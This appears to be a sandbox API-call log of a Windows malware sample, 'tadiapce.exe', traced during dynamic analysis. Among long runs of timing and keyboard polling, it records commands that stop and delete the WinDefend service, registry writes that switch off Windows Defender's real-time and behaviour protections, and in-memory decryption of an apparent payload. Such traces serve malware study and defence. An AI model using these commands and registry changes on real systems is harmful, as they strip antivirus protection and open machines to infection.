	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.401] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.402] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.403] GetTickCount () returned 0xa6628c
	[0054.414] GetKeyState (nVirtKey=144) returned 1
	[0054.414] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.414] GetAsyncKeyState (vKey=37) returned 0
	[0054.414] GetAsyncKeyState (vKey=39) returned 0
	[0054.414] GetAsyncKeyState (vKey=32) returned 0
	[0054.414] GetAsyncKeyState (vKey=13) returned 0
	[0054.414] GetAsyncKeyState (vKey=100) returned 0
	[0054.414] GetAsyncKeyState (vKey=102) returned 0
	[0054.414] GetAsyncKeyState (vKey=107) returned 0
	[0054.414] GetAsyncKeyState (vKey=109) returned 0
	[0054.429] GetKeyState (nVirtKey=144) returned 1
	[0054.429] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.445] GetKeyState (nVirtKey=144) returned 1
	[0054.445] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.460] GetKeyState (nVirtKey=144) returned 1
	[0054.460] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.476] GetAsyncKeyState (vKey=37) returned 0
	[0054.476] GetAsyncKeyState (vKey=39) returned 0
	[0054.476] GetAsyncKeyState (vKey=32) returned 0
	[0054.476] GetAsyncKeyState (vKey=13) returned 0
	[0054.476] GetAsyncKeyState (vKey=100) returned 0
	[0054.476] GetAsyncKeyState (vKey=102) returned 0
	[0054.476] GetAsyncKeyState (vKey=107) returned 0
	[0054.476] GetAsyncKeyState (vKey=109) returned 0
	[0054.477] GetKeyState (nVirtKey=144) returned 1
	[0054.477] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.491] GetKeyState (nVirtKey=144) returned 1
	[0054.491] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.507] GetKeyState (nVirtKey=144) returned 1
	[0054.507] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.523] GetKeyState (nVirtKey=144) returned 1
	[0054.523] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.538] GetAsyncKeyState (vKey=37) returned 0
	[0054.538] GetAsyncKeyState (vKey=39) returned 0
	[0054.538] GetAsyncKeyState (vKey=32) returned 0
	[0054.538] GetAsyncKeyState (vKey=13) returned 0
	[0054.538] GetAsyncKeyState (vKey=100) returned 0
	[0054.538] GetAsyncKeyState (vKey=102) returned 0
	[0054.538] GetAsyncKeyState (vKey=107) returned 0
	[0054.538] GetAsyncKeyState (vKey=109) returned 0
	[0054.538] GetKeyState (nVirtKey=144) returned 1
	[0054.538] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.554] GetKeyState (nVirtKey=144) returned 1
	[0054.554] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.569] GetKeyState (nVirtKey=144) returned 1
	[0054.569] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.585] GetKeyState (nVirtKey=144) returned 1
	[0054.585] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.601] GetAsyncKeyState (vKey=37) returned 0
	[0054.601] GetAsyncKeyState (vKey=39) returned 0
	[0054.601] GetAsyncKeyState (vKey=32) returned 0
	[0054.601] GetAsyncKeyState (vKey=13) returned 0
	[0054.601] GetAsyncKeyState (vKey=100) returned 0
	[0054.601] GetAsyncKeyState (vKey=102) returned 0
	[0054.601] GetAsyncKeyState (vKey=107) returned 0
	[0054.601] GetAsyncKeyState (vKey=109) returned 0
	[0054.601] GetKeyState (nVirtKey=144) returned 1
	[0054.601] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.616] GetKeyState (nVirtKey=144) returned 1
	[0054.616] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.632] GetKeyState (nVirtKey=144) returned 1
	[0054.632] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.647] GetKeyState (nVirtKey=144) returned 1
	[0054.647] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.663] GetAsyncKeyState (vKey=37) returned 0
	[0054.663] GetAsyncKeyState (vKey=39) returned 0
	[0054.663] GetAsyncKeyState (vKey=32) returned 0
	[0054.663] GetAsyncKeyState (vKey=13) returned 0
	[0054.663] GetAsyncKeyState (vKey=100) returned 0
	[0054.663] GetAsyncKeyState (vKey=102) returned 0
	[0054.663] GetAsyncKeyState (vKey=107) returned 0
	[0054.663] GetAsyncKeyState (vKey=109) returned 0
	[0054.663] GetKeyState (nVirtKey=144) returned 1
	[0054.663] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.679] GetKeyState (nVirtKey=144) returned 1
	[0054.679] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.694] GetKeyState (nVirtKey=144) returned 1
	[0054.694] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.710] GetKeyState (nVirtKey=144) returned 1
	[0054.710] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.719] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c sc stop WinDefend", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0054.783] GetAsyncKeyState (vKey=37) returned 0
	[0054.783] GetAsyncKeyState (vKey=39) returned 0
	[0054.783] GetAsyncKeyState (vKey=32) returned 0
	[0054.783] GetAsyncKeyState (vKey=13) returned 0
	[0054.783] GetAsyncKeyState (vKey=100) returned 0
	[0054.783] GetAsyncKeyState (vKey=102) returned 0
	[0054.783] GetAsyncKeyState (vKey=107) returned 0
	[0054.783] GetAsyncKeyState (vKey=109) returned 0
	[0054.783] GetKeyState (nVirtKey=144) returned 1
	[0054.783] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.788] GetAsyncKeyState (vKey=37) returned 0
	[0054.788] GetAsyncKeyState (vKey=39) returned 0
	[0054.788] GetAsyncKeyState (vKey=32) returned 0
	[0054.788] GetAsyncKeyState (vKey=13) returned 0
	[0054.788] GetAsyncKeyState (vKey=100) returned 0
	[0054.788] GetAsyncKeyState (vKey=102) returned 0
	[0054.788] GetAsyncKeyState (vKey=107) returned 0
	[0054.788] GetAsyncKeyState (vKey=109) returned 0
	[0054.788] GetKeyState (nVirtKey=144) returned 1
	[0054.788] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.803] GetKeyState (nVirtKey=144) returned 1
	[0054.803] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0054.812] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c sc delete WinDefend", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0055.006] GetKeyState (nVirtKey=144) returned 1
	[0055.101] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.101] GetAsyncKeyState (vKey=37) returned 0
	[0055.101] GetAsyncKeyState (vKey=39) returned 0
	[0055.101] GetAsyncKeyState (vKey=32) returned 0
	[0055.101] GetAsyncKeyState (vKey=13) returned 0
	[0055.101] GetAsyncKeyState (vKey=100) returned 0
	[0055.101] GetAsyncKeyState (vKey=102) returned 0
	[0055.101] GetAsyncKeyState (vKey=107) returned 0
	[0055.101] GetAsyncKeyState (vKey=109) returned 0
	[0055.101] GetKeyState (nVirtKey=144) returned 1
	[0055.101] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.115] GetKeyState (nVirtKey=144) returned 1
	[0055.115] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.131] GetKeyState (nVirtKey=144) returned 1
	[0055.131] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.147] GetKeyState (nVirtKey=144) returned 1
	[0055.147] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.162] GetAsyncKeyState (vKey=37) returned 0
	[0055.162] GetAsyncKeyState (vKey=39) returned 0
	[0055.162] GetAsyncKeyState (vKey=32) returned 0
	[0055.162] GetAsyncKeyState (vKey=13) returned 0
	[0055.162] GetAsyncKeyState (vKey=100) returned 0
	[0055.162] GetAsyncKeyState (vKey=102) returned 0
	[0055.162] GetAsyncKeyState (vKey=107) returned 0
	[0055.162] GetAsyncKeyState (vKey=109) returned 0
	[0055.163] GetKeyState (nVirtKey=144) returned 1
	[0055.163] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.178] GetKeyState (nVirtKey=144) returned 1
	[0055.178] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.205] GetKeyState (nVirtKey=144) returned 1
	[0055.205] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.209] GetKeyState (nVirtKey=144) returned 1
	[0055.209] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.225] GetAsyncKeyState (vKey=37) returned 0
	[0055.225] GetAsyncKeyState (vKey=39) returned 0
	[0055.225] GetAsyncKeyState (vKey=32) returned 0
	[0055.225] GetAsyncKeyState (vKey=13) returned 0
	[0055.225] GetAsyncKeyState (vKey=100) returned 0
	[0055.225] GetAsyncKeyState (vKey=102) returned 0
	[0055.225] GetAsyncKeyState (vKey=107) returned 0
	[0055.225] GetAsyncKeyState (vKey=109) returned 0
	[0055.225] GetKeyState (nVirtKey=144) returned 1
	[0055.225] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.240] GetKeyState (nVirtKey=144) returned 1
	[0055.240] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.256] GetKeyState (nVirtKey=144) returned 1
	[0055.256] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.271] GetKeyState (nVirtKey=144) returned 1
	[0055.271] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.288] GetAsyncKeyState (vKey=37) returned 0
	[0055.288] GetAsyncKeyState (vKey=39) returned 0
	[0055.288] GetAsyncKeyState (vKey=32) returned 0
	[0055.288] GetAsyncKeyState (vKey=13) returned 0
	[0055.288] GetAsyncKeyState (vKey=100) returned 0
	[0055.288] GetAsyncKeyState (vKey=102) returned 0
	[0055.288] GetAsyncKeyState (vKey=107) returned 0
	[0055.288] GetAsyncKeyState (vKey=109) returned 0
	[0055.288] GetKeyState (nVirtKey=144) returned 1
	[0055.288] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.303] GetKeyState (nVirtKey=144) returned 1
	[0055.303] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.318] GetKeyState (nVirtKey=144) returned 1
	[0055.318] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.334] GetKeyState (nVirtKey=144) returned 1
	[0055.334] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.349] GetAsyncKeyState (vKey=37) returned 0
	[0055.349] GetAsyncKeyState (vKey=39) returned 0
	[0055.350] GetAsyncKeyState (vKey=32) returned 0
	[0055.350] GetAsyncKeyState (vKey=13) returned 0
	[0055.350] GetAsyncKeyState (vKey=100) returned 0
	[0055.350] GetAsyncKeyState (vKey=102) returned 0
	[0055.350] GetAsyncKeyState (vKey=107) returned 0
	[0055.350] GetAsyncKeyState (vKey=109) returned 0
	[0055.350] GetKeyState (nVirtKey=144) returned 1
	[0055.350] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.365] GetKeyState (nVirtKey=144) returned 1
	[0055.365] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.381] GetKeyState (nVirtKey=144) returned 1
	[0055.381] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.397] GetKeyState (nVirtKey=144) returned 1
	[0055.397] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.425] GetAsyncKeyState (vKey=37) returned 0
	[0055.425] GetAsyncKeyState (vKey=39) returned 0
	[0055.425] GetAsyncKeyState (vKey=32) returned 0
	[0055.425] GetAsyncKeyState (vKey=13) returned 0
	[0055.425] GetAsyncKeyState (vKey=100) returned 0
	[0055.425] GetAsyncKeyState (vKey=102) returned 0
	[0055.425] GetAsyncKeyState (vKey=107) returned 0
	[0055.425] GetAsyncKeyState (vKey=109) returned 0
	[0055.425] GetKeyState (nVirtKey=144) returned 1
	[0055.425] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.428] GetKeyState (nVirtKey=144) returned 1
	[0055.428] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.447] GetKeyState (nVirtKey=144) returned 1
	[0055.447] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.459] GetKeyState (nVirtKey=144) returned 1
	[0055.459] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.474] GetAsyncKeyState (vKey=37) returned 0
	[0055.474] GetAsyncKeyState (vKey=39) returned 0
	[0055.474] GetAsyncKeyState (vKey=32) returned 0
	[0055.474] GetAsyncKeyState (vKey=13) returned 0
	[0055.474] GetAsyncKeyState (vKey=100) returned 0
	[0055.474] GetAsyncKeyState (vKey=102) returned 0
	[0055.474] GetAsyncKeyState (vKey=107) returned 0
	[0055.474] GetAsyncKeyState (vKey=109) returned 0
	[0055.475] GetKeyState (nVirtKey=144) returned 1
	[0055.475] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.490] GetKeyState (nVirtKey=144) returned 1
	[0055.490] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.505] GetKeyState (nVirtKey=144) returned 1
	[0055.505] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.521] GetKeyState (nVirtKey=144) returned 1
	[0055.521] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.537] GetAsyncKeyState (vKey=37) returned 0
	[0055.537] GetAsyncKeyState (vKey=39) returned 0
	[0055.537] GetAsyncKeyState (vKey=32) returned 0
	[0055.537] GetAsyncKeyState (vKey=13) returned 0
	[0055.537] GetAsyncKeyState (vKey=100) returned 0
	[0055.537] GetAsyncKeyState (vKey=102) returned 0
	[0055.537] GetAsyncKeyState (vKey=107) returned 0
	[0055.537] GetAsyncKeyState (vKey=109) returned 0
	[0055.537] GetKeyState (nVirtKey=144) returned 1
	[0055.537] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.552] GetKeyState (nVirtKey=144) returned 1
	[0055.552] InvalidateRect (hWnd=0x30278, lpRect=0x0, bErase=0) returned 1
	[0055.563] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2, phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x0) returned 0x2
	[0055.563] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", phkResult=0x12fe28 | out: phkResult=0x12fe28*=0xd0) returned 0x0
	[0055.564] RegSetValueExW (in: hKey=0xd0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0055.565] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2, phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x0) returned 0x2
	[0055.565] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x88) returned 0x0
	[0055.565] RegSetValueExW (in: hKey=0x88, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0055.565] RegSetValueExW (in: hKey=0x88, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0055.565] RegSetValueExW (in: hKey=0x88, lpValueName="DisableOnRealtimeEnable", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0055.565] RegSetValueExW (in: hKey=0x88, lpValueName="DisableIOAVProtection", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0055.566] RegCloseKey (hKey=0x88) returned 0x0
	[0055.566] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 0
	[0055.566] Sleep (dwMilliseconds=0x3) 
	[0055.568] VirtualAlloc (lpAddress=0x0, dwSize=0xef0, flAllocationType=0x1000, flProtect=0x40) returned 0x3c0000
	[0055.568] VirtualAlloc (lpAddress=0x0, dwSize=0x320, flAllocationType=0x1000, flProtect=0x40) returned 0x540000
	[0055.569] ShowWindow (hWnd=0x30278, nCmdShow=0) returned 0
	[0055.569] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x774c0000
	[0055.574] GetProcAddress (hModule=0x774c0000, lpProcName="CryptAcquireContextA") returned 0x774c91dd
	[0055.574] GetProcAddress (hModule=0x774c0000, lpProcName="CryptImportKey") returned 0x774cc532
	[0055.574] GetProcAddress (hModule=0x774c0000, lpProcName="CryptEncrypt") returned 0x774e779b
	[0055.575] CryptAcquireContextA (in: phProv=0x12fd78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x12fd78*=0x1779d0) returned 1
	[0055.661] CryptImportKey (in: hProv=0x1779d0, pbData=0x12fc2c, dwDataLen=0x134, hPubKey=0x0, dwFlags=0x0, phKey=0x12fc24 | out: phKey=0x12fc24*=0x1a6f90) returned 1
	[0055.668] CryptImportKey (in: hProv=0x1779d0, pbData=0x12fdc4, dwDataLen=0x4c, hPubKey=0x1a6f90, dwFlags=0x0, phKey=0x12fe18 | out: phKey=0x12fe18*=0x1a6fd0) returned 1
	[0055.668] CryptEncrypt (in: hKey=0x1a6fd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x40e148, pdwDataLen=0x12ff00*=0x28800, dwBufLen=0x28800 | out: pbData=0x40e148*, pdwDataLen=0x12ff00*=0x28800) returned 1
	[0055.682] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76b10000
	[0055.682] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77330000
	[0055.682] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAlloc") returned 0x76b62fb6
	[0055.682] GetProcAddress (hModule=0x77330000, lpProcName="memcpy") returned 0x77364cc0
	[0055.683] VirtualAlloc (lpAddress=0x0, dwSize=0x2b000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a20000
	[0055.700] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x12ac20 | out: BaseAddress=0x12ac20*=0x76b10000) returned 0x0
	[0055.826] GetStartupInfoW (in: lpStartupInfo=0x1a490ad | out: lpStartupInfo=0x1a490ad*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0055.827] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0055.827] Sleep (dwMilliseconds=0x1) 
	[0055.889] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x16e6e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0055.889] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0055.889] Sleep (dwMilliseconds=0x1) 
	[0055.935] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1a8738*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0055.935] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0055.935] Sleep (dwMilliseconds=0x1) 
	[0056.025] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x184448*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.025] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.026] Sleep (dwMilliseconds=0x1) 
	[0056.087] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1844d8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.087] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.087] Sleep (dwMilliseconds=0x1) 
	[0056.149] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1975c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.149] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.149] Sleep (dwMilliseconds=0x1) 
	[0056.256] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x197650*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.256] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.256] Sleep (dwMilliseconds=0x1) 
